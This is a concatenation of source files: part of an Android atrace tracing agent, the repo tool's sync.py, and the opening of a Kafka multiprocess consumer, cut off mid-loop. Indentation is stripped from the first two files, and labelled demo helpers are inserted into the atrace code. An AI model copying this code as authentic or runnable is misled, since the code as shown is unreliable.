t1 = trace_time_module.Now()
shell.RunCommand(cmd, close=True)
did_record_sync_marker_callback(t1, sync_id)
def _dump_trace(self):
"""Dumps the atrace buffer and returns the dumped buffer."""
dump_cmd = self._tracer_args + ['--async_dump']
return self._device_utils.RunShellCommand(dump_cmd, raw_output=True)
def _stop_trace(self):
"""Stops atrace.
Tries to stop atrace asynchronously. Note that on some devices
--async_stop does not work, so this falls back to running a
zero-length synchronous trace if tracing is still enabled.
"""
self._device_utils.RunShellCommand(self._tracer_args + ['--async_stop'])
is_trace_enabled_cmd = ['cat', '/sys/kernel/debug/tracing/tracing_on']
trace_on = int(self._device_utils.RunShellCommand(is_trace_enabled_cmd)[0])
if trace_on:
self._device_utils.RunShellCommand(self._tracer_args + ['-t 0'])
def _collect_trace_data(self):
"""Reads the output from atrace and stops the trace."""
result = self._dump_trace()
data_start = re.search(TRACE_START_REGEXP, result)
if data_start:
data_start = data_start.end(0)
else:
raise IOError('Unable to get atrace data. Did you forget adb root?')
output = re.sub(ADB_IGNORE_REGEXP, '', result[data_start:])
self._stop_trace()
return output
def _preprocess_trace_data(self, trace_data):
"""Performs various processing on atrace data.
Args:
trace_data: The raw trace data.
Returns:
The processed trace data.
"""
if trace_data:
trace_data = strip_and_decompress_trace(trace_data)
if not trace_data:
print >> sys.stderr, ('No data was captured. Output file was not '
'written.')
sys.exit(1)
if self._config.fix_threads:
# Issue ps command to device and patch thread names
ps_dump = do_preprocess_adb_cmd('ps -t',
self._config.device_serial_number)
if ps_dump is not None:
thread_names = extract_thread_list(ps_dump)
trace_data = fix_thread_names(trace_data, thread_names)
if self._config.fix_tgids:
# Issue printf command to device and patch tgids
procfs_dump = do_preprocess_adb_cmd('printf "%s\n" ' +
'/proc/[0-9]*/task/[0-9]*',
self._config.device_serial_number)
if procfs_dump is not None:
pid2_tgid = extract_tgids(procfs_dump)
trace_data = fix_missing_tgids(trace_data, pid2_tgid)
if self._config.fix_circular:
trace_data = fix_circular_traces(trace_data)
return trace_data
class BootAgent(AtraceAgent):
"""AtraceAgent that specializes in tracing the boot sequence."""
def __init__(self):
super(BootAgent, self).__init__()
@py_utils.Timeout(tracing_agents.START_STOP_TIMEOUT)
def StartAgentTracing(self, config, timeout=None):
self._config = config
try:
setup_args = _construct_boot_setup_command(config)
subprocess.check_call(setup_args)
except OSError as error:
print >> sys.stderr, (
'The command "%s" failed with the following error:' %
' '.join(setup_args))
print >> sys.stderr, ' ', error
sys.exit(1)
def _dump_trace(self): #called by StopAgentTracing
"""Dumps the running trace asynchronously and returns the dumped trace."""
dump_cmd = _construct_boot_trace_command(self._config)
return self._device_utils.RunShellCommand(dump_cmd, raw_output=True)
def _stop_trace(self): # called by _collect_trace_data via StopAgentTracing
# pylint: disable=no-self-use
# This is a member function for consistency with AtraceAgent
pass # don't need to stop separately; already done in dump_trace
def _construct_boot_setup_command(config):
echo_args = (['echo'] + config.atrace_categories +
['>', BOOTTRACE_CATEGORIES])
setprop_args = ['setprop', BOOTTRACE_PROP, '1']
reboot_args = ['reboot']
return util.construct_adb_shell_command(
echo_args + ['&&'] + setprop_args + ['&&'] + reboot_args,
config.device_serial_number)
def _construct_boot_trace_command(config):
atrace_args = ['atrace', '--async_stop']
setprop_args = ['setprop', BOOTTRACE_PROP, '0']
rm_args = ['rm', BOOTTRACE_CATEGORIES]
return util.construct_adb_shell_command(
atrace_args + ['&&'] + setprop_args + ['&&'] + rm_args,
config.device_serial_number)
def extract_thread_list(trace_text):
"""Removes the thread list from the given trace data.
Args:
trace_text: The text portion of the trace
Returns:
a map of thread ids to thread names
"""
threads = {}
# start at line 1 to skip the top of the ps dump:
text = trace_text.splitlines()
for line in text[1:]:
cols = line.split(None, 8)
if len(cols) == 9:
tid = int(cols[1])
name = cols[8]
threads[tid] = name
return threads
def extract_tgids(trace_text):
"""Removes the procfs dump from the given trace text
Args:
trace_text: The text portion of the trace
Returns:
a map of pids to their tgid.
"""
tgid_2pid = {}
text = trace_text.splitlines()
for line in text:
result = re.match('^/proc/([0-9]+)/task/([0-9]+)', line)
if result:
parent_pid, tgid = result.group(1, 2)
tgid_2pid[tgid] = parent_pid
return tgid_2pid
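# --- Illustrative sketch (added for exposition; not in the original file) ----
# extract_tgids() above maps each thread id from a /proc listing to the pid of
# the process that owns it. The helper name _extract_tgids_demo is hypothetical.
def _extract_tgids_demo():
    dump = '/proc/880/task/880\n/proc/880/task/895\n'
    return extract_tgids(dump)  # -> {'880': '880', '895': '880'}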
def strip_and_decompress_trace(trace_data):
"""Fixes new-lines and decompresses trace data.
Args:
trace_data: The trace data returned by atrace.
Returns:
The decompressed trace data.
"""
# Collapse CRLFs that are added by adb shell.
if trace_data.startswith('\r\n'):
trace_data = trace_data.replace('\r\n', '\n')
elif trace_data.startswith('\r\r\n'):
# On windows, adb adds an extra '\r' character for each line.
trace_data = trace_data.replace('\r\r\n', '\n')
# Skip the initial newline.
if trace_data[0] == '\n':
trace_data = trace_data[1:]
if not trace_data.startswith(TRACE_TEXT_HEADER):
# No header found, so assume the data is compressed.
trace_data = zlib.decompress(trace_data)
# Enforce Unix line-endings.
trace_data = trace_data.replace('\r', '')
# Skip any initial newlines.
while trace_data and trace_data[0] == '\n':
trace_data = trace_data[1:]
return trace_data
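# --- Illustrative sketch (added for exposition; not in the original file) ----
# strip_and_decompress_trace() above on the kind of plain-text output adb shell
# returns: CRLFs are collapsed and the leading blank line is dropped. Compressed
# input (no '# tracer' header) would go through zlib.decompress() instead.
def _strip_and_decompress_trace_demo():
    raw = '\r\n# tracer: nop\r\nline one\r\n'
    return strip_and_decompress_trace(raw)  # -> '# tracer: nop\nline one\n'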
def fix_thread_names(trace_data, thread_names):
"""Replaces thread ids with their names.
Args:
trace_data: The atrace data.
thread_names: A mapping of thread ids to thread names.
Returns:
The updated trace data.
"""
def repl(m):
tid = int(m.group(2))
if tid > 0:
name = thread_names.get(tid)
if name is None:
name = m.group(1)
if name == '<...>':
name = '<' + str(tid) + '>'
thread_names[tid] = name
return name + '-' + m.group(2)
else:
return m.group(0)
# matches something like:
# Binder_2-895, or com.google.android.inputmethod.latin-1078 etc...
trace_data = re.sub(r'^\s*(\S+)-(\d+)', repl, trace_data,
flags=re.MULTILINE)
return trace_data
def fix_missing_tgids(trace_data, pid2_tgid):
"""Replaces missing TGIDs from the trace data with those found in procfs
Args:
trace_data: the atrace data
Returns:
The updated trace data with missing TGIDs replaced with the correct TGID
"""
def repl(m):
tid = m.group(2)
if (int(tid) > 0 and m.group(1) != '<idle>' and m.group(3) == '(-----)'
and tid in pid2_tgid):
# returns Proc_name-PID (TGID)
# Binder_2-381 (-----) becomes Binder_2-381 (128)
return m.group(1) + '-' + m.group(2) + ' ( ' + pid2_tgid[tid] + ')'
return m.group(0)
# matches something like:
# Binder_2-895 (-----)
trace_data = re.sub(r'^\s*(\S+)-(\d+)\s+(\(\S+\))', repl, trace_data,
flags=re.MULTILINE)
return trace_data
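# --- Illustrative sketch (added for exposition; not in the original file) ----
# fix_missing_tgids() above patches '(-----)' placeholders using the tid->tgid
# map built by extract_tgids(). The sample line and ids below are made up.
def _fix_missing_tgids_demo():
    line = 'Binder_2-895   (-----) [001] ...1: tracing_mark_write: B|895|draw'
    return fix_missing_tgids(line, {'895': '880'})  # '(-----)' becomes '( 880)'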
def fix_circular_traces(out):
"""Fix inconsistentcies in traces due to circular buffering.
The circular buffers are kept per CPU, so it is not guaranteed that the
beginning of a slice is overwritten before the end. To work around this, we
throw away the prefix of the trace where not all CPUs have events yet.
Args:
out: The data to fix.
Returns:
The updated trace data.
"""
# If any of the CPU's buffers have filled up and
# older events have been dropped, the kernel
# emits markers of the form '##### CPU 2 buffer started ####' on
# the line before the first event in the trace on that CPU.
#
# No such headers are emitted if there were no overflows or the trace
# was captured with non-circular buffers.
buffer_start_re = re.compile(r'^#+ CPU \d+ buffer started', re.MULTILINE)
start_of_full_trace = 0
while True:
result = buffer_start_re.search(out, start_of_full_trace + 1)
if result:
start_of_full_trace = result.start()
else:
break
if start_of_full_trace > 0:
# Need to keep the header intact to make the importer happy.
end_of_header = re.search(r'^[^#]', out, re.MULTILINE).start()
out = out[:end_of_header] + out[start_of_full_trace:]
return out
def do_preprocess_adb_cmd(command, serial):
"""Run an ADB command for preprocessing of output.
Run an ADB command and get the results. This function is used for
running commands relating to preprocessing of output data.
Args:
command: Command to run.
serial: Serial number of device.
"""
args = [command]
dump, ret_code = util.run_adb_shell(args, serial)
if ret_code != 0:
return None
dump = ''.join(dump)
return dump
class AtraceConfig(tracing_agents.TracingConfig):
def __init__(self, atrace_categories, trace_buf_size, kfuncs,
app_name, fix_threads, fix_tgids, fix_circular,
compress_trace_data, boot, from_file, device_serial_number,
trace_time, target):
tracing_agents.TracingConfig.__init__(self)
self.atrace_categories = atrace_categories
self.trace_buf_size = trace_buf_size
self.kfuncs = kfuncs
self.app_name = app_name
self.fix_threads = fix_threads
self.fix_tgids = fix_tgids
self.fix_circular = fix_circular
self.compress_trace_data = compress_trace_data
self.boot = boot
self.from_file = from_file
self.device_serial_number = device_serial_number
self.trace_time = trace_time
self.target = target
def add_options(parser):
options = optparse.OptionGroup(parser, 'Atrace options')
options.add_option('--atrace-categories', dest='atrace_categories',
help='Select atrace categories with a comma-delimited '
'list, e.g. --atrace-categories=cat1,cat2,cat3')
options.add_option('-k', '--ktrace', dest='kfuncs', action='store',
help='specify a comma-separated list of kernel functions '
'to trace')
options.add_option('-a', '--app', dest='app_name', default=None,
type='string', action='store',
help='enable application-level tracing for '
'comma-separated list of app cmdlines')
options.add_option('--no-compress', dest='compress_trace_data',
default=True, action='store_false',
help='Tell the device not to send the trace data in '
'compressed form.')
options.add_option('--boot', dest='boot', default=False, action='store_true',
help='reboot the device with tracing during boot enabled. '
'The report is created by hitting Ctrl+C after the device '
'has booted up.')
return options
def get_config(options):
return AtraceConfig(options.atrace_categories,
options.trace_buf_size, options.kfuncs,
options.app_name, options.fix_threads,
options.fix_tgids, options.fix_circular,
options.compress_trace_data, options.boot,
options.from_file, options.device_serial_number,
options.trace_time, options.target)
|
sync.py
|
#
# Copyright (C) 2008 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import netrc
from optparse import SUPPRESS_HELP
import os
import pickle
import re
import shutil
import socket
import subprocess
import sys
import time
from pyversion import is_python3
if is_python3():
import urllib.parse
import xmlrpc.client
else:
import imp
import urlparse
import xmlrpclib
urllib = imp.new_module('urllib')
urllib.parse = urlparse
xmlrpc = imp.new_module('xmlrpc')
xmlrpc.client = xmlrpclib
try:
import threading as _threading
except ImportError:
import dummy_threading as _threading
try:
import resource
def _rlimit_nofile():
return resource.getrlimit(resource.RLIMIT_NOFILE)
except ImportError:
def _rlimit_nofile():
return (256, 256)
try:
import multiprocessing
except ImportError:
multiprocessing = None
from git_command import GIT, git_require
from git_refs import R_HEADS, HEAD
from main import WrapperModule
from project import Project
from project import RemoteSpec
from command import Command, MirrorSafeCommand
from error import RepoChangedException, GitError, ManifestParseError
from project import SyncBuffer
from progress import Progress
_ONE_DAY_S = 24 * 60 * 60
class _FetchError(Exception):
"""Internal error thrown in _FetchHelper() when we don't want stack trace."""
pass
class Sync(Command, MirrorSafeCommand):
jobs = 1
common = True
helpSummary = "Update working tree to the latest revision"
helpUsage = """
%prog [<project>...]
"""
helpDescription = """
The '%prog' command synchronizes local project directories
with the remote repositories specified in the manifest. If a local
project does not yet exist, it will clone a new local directory from
the remote repository and set up tracking branches as specified in
the manifest. If the local project already exists, '%prog'
will update the remote branches and rebase any new local changes
on top of the new remote changes.
'%prog' will synchronize all projects listed at the command
line. Projects can be specified either by name, or by a relative
or absolute path to the project's local directory. If no projects
are specified, '%prog' will synchronize all projects listed in
the manifest.
The -d/--detach option can be used to switch specified projects
back to the manifest revision. This option is especially helpful
if the project is currently on a topic branch, but the manifest
revision is temporarily needed.
The -s/--smart-sync option can be used to sync to a known good
build as specified by the manifest-server element in the current
manifest. The -t/--smart-tag option is similar and allows you to
specify a custom tag/label.
The -u/--manifest-server-username and -p/--manifest-server-password
options can be used to specify a username and password to authenticate
with the manifest server when using the -s or -t option.
If -u and -p are not specified when using the -s or -t option, '%prog'
will attempt to read authentication credentials for the manifest server
from the user's .netrc file.
'%prog' will not use authentication credentials from -u/-p or .netrc
if the manifest server specified in the manifest file already includes
credentials.
The -f/--force-broken option can be used to proceed with syncing
other projects if a project sync fails.
The --no-clone-bundle option disables any attempt to use
$URL/clone.bundle to bootstrap a new Git repository from a
resumable bundle file on a content delivery network. This
may be necessary if there are problems with the local Python
HTTP client or proxy configuration, but the Git binary works.
The --fetch-submodules option enables fetching Git submodules
of a project from server.
SSH Connections
---------------
If at least one project remote URL uses an SSH connection (ssh://,
git+ssh://, or user@host:path syntax) repo will automatically
enable the SSH ControlMaster option when connecting to that host.
This feature permits other projects in the same '%prog' session to
reuse the same SSH tunnel, saving connection setup overheads.
To disable this behavior on UNIX platforms, set the GIT_SSH
environment variable to 'ssh'. For example:
export GIT_SSH=ssh
%prog
Compatibility
~~~~~~~~~~~~~
This feature is automatically disabled on Windows, due to the lack
of UNIX domain socket support.
This feature is not compatible with url.insteadof rewrites in the
user's ~/.gitconfig. '%prog' is currently not able to perform the
rewrite early enough to establish the ControlMaster tunnel.
If the remote SSH daemon is Gerrit Code Review, version 2.0.10 or
later is required to fix a server side protocol bug.
"""
def _Options(self, p, show_smart=True):
try:
self.jobs = self.manifest.default.sync_j
except ManifestParseError:
self.jobs = 1
p.add_option('-f', '--force-broken',
dest='force_broken', action='store_true',
help="continue sync even if a project fails to sync")
p.add_option('-l', '--local-only',
dest='local_only', action='store_true',
help="only update working tree, don't fetch")
p.add_option('-n', '--network-only',
dest='network_only', action='store_true',
help="fetch only, don't update working tree")
p.add_option('-d', '--detach',
dest='detach_head', action='store_true',
help='detach projects back to manifest revision')
p.add_option('-c', '--current-branch',
dest='current_branch_only', action='store_true',
help='fetch only current branch from server')
p.add_option('-q', '--quiet',
dest='quiet', action='store_true',
help='be more quiet')
p.add_option('-j', '--jobs',
dest='jobs', action='store', type='int',
help="projects to fetch simultaneously (default %d)" % self.jobs)
p.add_option('-m', '--manifest-name',
dest='manifest_name',
help='temporary manifest to use for this sync', metavar='NAME.xml')
p.add_option('--no-clone-bundle',
dest='no_clone_bundle', action='store_true',
help='disable use of /clone.bundle on HTTP/HTTPS')
p.add_option('-u', '--manifest-server-username', action='store',
dest='manifest_server_username',
help='username to authenticate with the manifest server')
p.add_option('-p', '--manifest-server-password', action='store',
dest='manifest_server_password',
help='password to authenticate with the manifest server')
p.add_option('--fetch-submodules',
dest='fetch_submodules', action='store_true',
help='fetch submodules from server')
p.add_option('--no-tags',
dest='no_tags', action='store_true',
help="don't fetch tags")
if show_smart:
p.add_option('-s', '--smart-sync',
dest='smart_sync', action='store_true',
help='smart sync using manifest from a known good build')
p.add_option('-t', '--smart-tag',
dest='smart_tag', action='store',
help='smart sync using manifest from a known tag')
g = p.add_option_group('repo Version options')
g.add_option('--no-repo-verify',
dest='no_repo_verify', action='store_true',
help='do not verify repo source code')
g.add_option('--repo-upgraded',
dest='repo_upgraded', action='store_true',
help=SUPPRESS_HELP)
def _FetchHelper(self, opt, project, lock, fetched, pm, sem, err_event):
"""Main function of the fetch threads when jobs are > 1.
Args:
opt: Program options returned from optparse. See _Options().
project: Project object for the project to fetch.
lock: Lock for accessing objects that are shared amongst multiple
_FetchHelper() threads.
fetched: set object that we will add project.gitdir to when we're done
(with our lock held).
pm: Instance of a Project object. We will call pm.update() (with our
lock held).
sem: We'll release() this semaphore when we exit so that another thread
can be started up.
err_event: We'll set this event in the case of an error (after printing
out info about the error).
"""
# We'll set to true once we've locked the lock.
did_lock = False
if not opt.quiet:
print('Fetching project %s' % project.name)
# Encapsulate everything in a try/except/finally so that:
# - We always set err_event in the case of an exception.
# - We always make sure we call sem.release().
# - We always make sure we unlock the lock if we locked it.
try:
try:
start = time.time()
success = project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags)
self._fetch_times.Set(project, time.time() - start)
# Lock around all the rest of the code, since printing, updating a set
# and Progress.update() are not thread safe.
lock.acquire()
did_lock = True
if not success:
print('error: Cannot fetch %s' % project.name, file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync',
file=sys.stderr)
else:
raise _FetchError()
fetched.add(project.gitdir)
pm.update()
except _FetchError:
err_event.set()
except:
err_event.set()
raise
finally:
if did_lock:
lock.release()
sem.release()
def _Fetch(self, projects, opt):
fetched = set()
pm = Progress('Fetching projects', len(projects))
if self.jobs == 1:
for project in projects:
pm.update()
if not opt.quiet:
print('Fetching project %s' % project.name)
if project.Sync_NetworkHalf(
quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
clone_bundle=not opt.no_clone_bundle,
no_tags=opt.no_tags):
fetched.add(project.gitdir)
else:
print('error: Cannot fetch %s' % project.name, file=sys.stderr)
if opt.force_broken:
print('warn: --force-broken, continuing to sync', file=sys.stderr)
else:
sys.exit(1)
else:
threads = set()
lock = _threading.Lock()
sem = _threading.Semaphore(self.jobs)
err_event = _threading.Event()
for project in projects:
# Check for any errors before starting any new threads.
# ...we'll let existing threads finish, though.
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target = self._FetchHelper,
args = (opt,
project,
lock,
fetched,
pm,
sem,
err_event))
# Ensure that Ctrl-C will not freeze the repo process.
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
# If we saw an error, exit with code 1 so that other scripts can check.
if err_event.isSet():
print('\nerror: Exited sync due to fetch errors', file=sys.stderr)
sys.exit(1)
pm.end()
self._fetch_times.Save()
self._GCProjects(projects)
return fetched
def _GCProjects(self, projects):
has_dash_c = git_require((1, 7, 2))
if multiprocessing and has_dash_c:
cpu_count = multiprocessing.cpu_count()
else:
cpu_count = 1
jobs = min(self.jobs, cpu_count)
if jobs < 2:
for project in projects:
project.bare_git.gc('--auto')
return
config = {'pack.threads': cpu_count // jobs if cpu_count > jobs else 1}
threads = set()
sem = _threading.Semaphore(jobs)
err_event = _threading.Event()
def GC(project):
try:
try:
project.bare_git.gc('--auto', config=config)
except GitError:
err_event.set()
except:
err_event.set()
raise
finally:
sem.release()
for project in projects:
if err_event.isSet():
break
sem.acquire()
t = _threading.Thread(target=GC, args=(project,))
t.daemon = True
threads.add(t)
t.start()
for t in threads:
t.join()
if err_event.isSet():
print('\nerror: Exited sync due to gc errors', file=sys.stderr)
sys.exit(1)
def _ReloadManifest(self, manifest_name=None):
if manifest_name:
# Override calls _Unload already
self.manifest.Override(manifest_name)
else:
self.manifest._Unload()
def UpdateProjectList(self):
new_project_paths = []
for project in self.GetProjects(None, missing_ok=True):
if project.relpath:
new_project_paths.append(project.relpath)
file_name = 'project.list'
file_path = os.path.join(self.manifest.repodir, file_name)
old_project_paths = []
if os.path.exists(file_path):
fd = open(file_path, 'r')
try:
old_project_paths = fd.read().split('\n')
finally:
fd.close()
for path in old_project_paths:
if not path:
continue
if path not in new_project_paths:
# If the path has already been deleted, we don't need to do it
if os.path.exists(self.manifest.topdir + '/' + path):
project = Project(
manifest = self.manifest,
name = path,
remote = RemoteSpec('origin'),
gitdir = os.path.join(self.manifest.topdir,
path, '.git'),
worktree = os.path.join(self.manifest.topdir, path),
relpath = path,
revisionExpr = 'HEAD',
revisionId = None,
groups = None)
if project.IsDirty():
print('error: Cannot remove project "%s": uncommitted changes '
'are present' % project.relpath, file=sys.stderr)
print(' commit changes, then run sync again',
file=sys.stderr)
return -1
else:
print('Deleting obsolete path %s' % project.worktree,
file=sys.stderr)
shutil.rmtree(project.worktree)
# Try deleting parent subdirs if they are empty
project_dir = os.path.dirname(project.worktree)
while project_dir != self.manifest.topdir:
try:
os.rmdir(project_dir)
except OSError:
break
project_dir = os.path.dirname(project_dir)
new_project_paths.sort()
fd = open(file_path, 'w')
try:
fd.write('\n'.join(new_project_paths))
fd.write('\n')
finally:
fd.close()
return 0
def Execute(self, opt, args):
if opt.jobs:
self.jobs = opt.jobs
if self.jobs > 1:
soft_limit, _ = _rlimit_nofile()
self.jobs = min(self.jobs, (soft_limit - 5) // 3)
if opt.network_only and opt.detach_head:
print('error: cannot combine -n and -d', file=sys.stderr)
sys.exit(1)
if opt.network_only and opt.local_only:
print('error: cannot combine -n and -l', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_sync:
print('error: cannot combine -m and -s', file=sys.stderr)
sys.exit(1)
if opt.manifest_name and opt.smart_tag:
print('error: cannot combine -m and -t', file=sys.stderr)
sys.exit(1)
if opt.manifest_server_username or opt.manifest_server_password:
if not (opt.smart_sync or opt.smart_tag):
print('error: -u and -p may only be combined with -s or -t',
file=sys.stderr)
sys.exit(1)
if None in [opt.manifest_server_username, opt.manifest_server_password]:
print('error: both -u and -p must be given', file=sys.stderr)
sys.exit(1)
if opt.manifest_name:
self.manifest.Override(opt.manifest_name)
manifest_name = opt.manifest_name
if opt.smart_sync or opt.smart_tag:
if not self.manifest.manifest_server:
print('error: cannot smart sync: no manifest server defined in '
'manifest', file=sys.stderr)
sys.exit(1)
manifest_server = self.manifest.manifest_server
if not opt.quiet:
print('Using manifest server %s' % manifest_server)
if not '@' in manifest_server:
username = None
password = None
if opt.manifest_server_username and opt.manifest_server_password:
username = opt.manifest_server_username
password = opt.manifest_server_password
else:
try:
info = netrc.netrc()
except IOError:
print('.netrc file does not exist or could not be opened',
file=sys.stderr)
else:
try:
parse_result = urllib.parse.urlparse(manifest_server)
if parse_result.hostname:
username, _account, password = \
info.authenticators(parse_result.hostname)
except TypeError:
# TypeError is raised when the given hostname is not present
# in the .netrc file.
print('No credentials found for %s in .netrc'
% parse_result.hostname, file=sys.stderr)
except netrc.NetrcParseError as e:
print('Error parsing .netrc file: %s' % e, file=sys.stderr)
if (username and password):
manifest_server = manifest_server.replace('://', '://%s:%s@' %
(username, password),
1)
try:
server = xmlrpc.client.Server(manifest_server)
if opt.smart_sync:
p = self.manifest.manifestProject
b = p.GetBranch(p.CurrentBranch)
branch = b.merge
if branch.startswith(R_HEADS):
branch = branch[len(R_HEADS):]
env = os.environ.copy()
if 'TARGET_PRODUCT' in env and 'TARGET_BUILD_VARIANT' in env:
target = '%s-%s' % (env['TARGET_PRODUCT'],
env['TARGET_BUILD_VARIANT'])
[success, manifest_str] = server.GetApprovedManifest(branch, target)
else:
[success, manifest_str] = server.GetApprovedManifest(branch)
else:
assert(opt.smart_tag)
[success, manifest_str] = server.GetManifest(opt.smart_tag)
if success:
manifest_name = "smart_sync_override.xml"
manifest_path = os.path.join(self.manifest.manifestProject.worktree,
manifest_name)
try:
f = open(manifest_path, 'w')
try:
f.write(manifest_str)
finally:
f.close()
except IOError:
print('error: cannot write manifest to %s' % manifest_path,
file=sys.stderr)
sys.exit(1)
self._ReloadManifest(manifest_name)
else:
print('error: manifest server RPC call failed: %s' %
manifest_str, file=sys.stderr)
sys.exit(1)
except (socket.error, IOError, xmlrpc.client.Fault) as e:
print('error: cannot connect to manifest server %s:\n%s'
% (self.manifest.manifest_server, e), file=sys.stderr)
sys.exit(1)
except xmlrpc.client.ProtocolError as e:
print('error: cannot connect to manifest server %s:\n%d %s'
% (self.manifest.manifest_server, e.errcode, e.errmsg),
file=sys.stderr)
sys.exit(1)
rp = self.manifest.repoProject
rp.PreSync()
mp = self.manifest.manifestProject
mp.PreSync()
if opt.repo_upgraded:
_PostRepoUpgrade(self.manifest, quiet=opt.quiet)
if not opt.local_only:
mp.Sync_NetworkHalf(quiet=opt.quiet,
current_branch_only=opt.current_branch_only,
no_tags=opt.no_tags)
if mp.HasChanges:
syncbuf = SyncBuffer(mp.config)
mp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
self._ReloadManifest(manifest_name)
if opt.jobs is None:
self.jobs = self.manifest.default.sync_j
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
self._fetch_times = _FetchTimes(self.manifest)
if not opt.local_only:
to_fetch = []
now = time.time()
if _ONE_DAY_S <= (now - rp.LastFetch):
to_fetch.append(rp)
to_fetch.extend(all_projects)
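# Fetch the historically slowest projects first so the long-running fetches
# start early and total wall-clock time is less dominated by stragglers.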
to_fetch.sort(key=self._fetch_times.Get, reverse=True)
fetched = self._Fetch(to_fetch, opt)
_PostRepoFetch(rp, opt.no_repo_verify)
if opt.network_only:
# bail out now; the rest touches the working tree
return
# Iteratively fetch missing and/or nested unregistered submodules
previously_missing_set = set()
while True:
self._ReloadManifest(manifest_name)
all_projects = self.GetProjects(args,
missing_ok=True,
submodules_ok=opt.fetch_submodules)
missing = []
for project in all_projects:
if project.gitdir not in fetched:
missing.append(project)
if not missing:
break
# Avoid fetching missing repos forever: if the set of missing repos has not
# changed since the last fetch, break out of the loop.
missing_set = set(p.name for p in missing)
if previously_missing_set == missing_set:
break
previously_missing_set = missing_set
fetched.update(self._Fetch(missing, opt))
if self.manifest.IsMirror:
# bail out now, we have no working tree
return
if self.UpdateProjectList():
sys.exit(1)
syncbuf = SyncBuffer(mp.config,
detach_head = opt.detach_head)
pm = Progress('Syncing work tree', len(all_projects))
for project in all_projects:
pm.update()
if project.worktree:
project.Sync_LocalHalf(syncbuf)
pm.end()
print(file=sys.stderr)
if not syncbuf.Finish():
sys.exit(1)
# If there's a notice that's supposed to print at the end of the sync, print
# it now...
if self.manifest.notice:
print(self.manifest.notice)
def _PostRepoUpgrade(manifest, quiet=False):
wrapper = WrapperModule()
if wrapper.NeedSetupGnuPG():
wrapper.SetupGnuPG(quiet)
for project in manifest.projects.values():
if project.Exists:
project.PostRepoUpgrade()
def _PostRepoFetch(rp, no_repo_verify=False, verbose=False):
if rp.HasChanges:
print('info: A new version of repo is available', file=sys.stderr)
print(file=sys.stderr)
if no_repo_verify or _VerifyTag(rp):
syncbuf = SyncBuffer(rp.config)
rp.Sync_LocalHalf(syncbuf)
if not syncbuf.Finish():
sys.exit(1)
print('info: Restarting repo with latest version', file=sys.stderr)
raise RepoChangedException(['--repo-upgraded'])
else:
print('warning: Skipped upgrade to unverified version', file=sys.stderr)
else:
if verbose:
print('repo version %s is current' % rp.work_git.describe(HEAD),
file=sys.stderr)
def _VerifyTag(project):
gpg_dir = os.path.expanduser('~/.repoconfig/gnupg')
if not os.path.exists(gpg_dir):
print('warning: GnuPG was not available during last "repo init"\n'
'warning: Cannot automatically authenticate repo.',
file=sys.stderr)
return True
try:
cur = project.bare_git.describe(project.GetRevisionId())
except GitError:
cur = None
if not cur \
or re.compile(r'^.*-[0-9]{1,}-g[0-9a-f]{1,}$').match(cur):
rev = project.revisionExpr
if rev.startswith(R_HEADS):
rev = rev[len(R_HEADS):]
print(file=sys.stderr)
print("warning: project '%s' branch '%s' is not signed"
% (project.name, rev), file=sys.stderr)
return False
env = os.environ.copy()
env['GIT_DIR'] = project.gitdir.encode()
env['GNUPGHOME'] = gpg_dir.encode()
cmd = [GIT, 'tag', '-v', cur]
proc = subprocess.Popen(cmd,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE,
env = env)
out = proc.stdout.read()
proc.stdout.close()
err = proc.stderr.read()
proc.stderr.close()
if proc.wait() != 0:
print(file=sys.stderr)
print(out, file=sys.stderr)
print(err, file=sys.stderr)
print(file=sys.stderr)
return False
return True
class _FetchTimes(object):
_ALPHA = 0.5
def __init__(self, manifest):
self._path = os.path.join(manifest.repodir, '.repopickle_fetchtimes')
self._times = None
self._seen = set()
def Get(self, project):
self._Load()
return self._times.get(project.name, _ONE_DAY_S)
def Set(self, project, t):
self._Load()
name = project.name
old = self._times.get(name, t)
self._seen.add(name)
a = self._ALPHA
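# Exponential moving average: blend the newly observed fetch time with the
# previous estimate so a single fast or slow sync does not dominate.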
self._times[name] = (a*t) + ((1-a) * old)
def _Load(self):
if self._times is None:
try:
f = open(self._path, 'rb')
except IOError:
self._times = {}
return self._times
try:
try:
self._times = pickle.load(f)
except (IOError, EOFError, pickle.PickleError):
try:
os.remove(self._path)
except OSError:
pass
self._times = {}
finally:
f.close()
return self._times
def Save(self):
if self._times is None:
return
to_delete = []
for name in self._times:
if name not in self._seen:
to_delete.append(name)
for name in to_delete:
del self._times[name]
try:
f = open(self._path, 'wb')
try:
pickle.dump(self._times, f)
except (IOError, OSError, pickle.PickleError):
try:
os.remove(self._path)
except OSError:
pass
finally:
f.close()
|
mp_consume.py
|
from collections import namedtuple
import logging
import queue
from multiprocessing import Process, Manager as MPManager
from .confluent_python_consumer import _mp_consume as _mp_consume_confluent_kafka
from .kafka_python_consumer import _mp_consume as _mp_consume_kafka_python
Events = namedtuple("Events", ["start", "stop", "exit"])
class MultiProcessConsumer:
def __init__(self, use_confluent_kafka=False, num_procs=1, report_interval=5, json_logging=False, log_level='INFO', verbose=False, **consumer_options):
# Variables for managing and controlling the data flow from the
# consumer child processes to the master
manager = MPManager()
self.queue = manager.Queue(1024) # Child consumers dump messages into this
self.events = Events(
start = manager.Event(), # Signals the consumers to start fetching
stop = manager.Event(), # Signals the consumers to stop fetching and pushing data until start is set again
exit = manager.Event() # Requests the consumers to shut down
)
self.report_interval = report_interval
self.num_procs = num_procs
self.consumer_options = consumer_options
self.json_logging = json_logging
self.verbose = verbose
self.log_level = log_level
self.procs = []
for _ in range(self.num_procs):
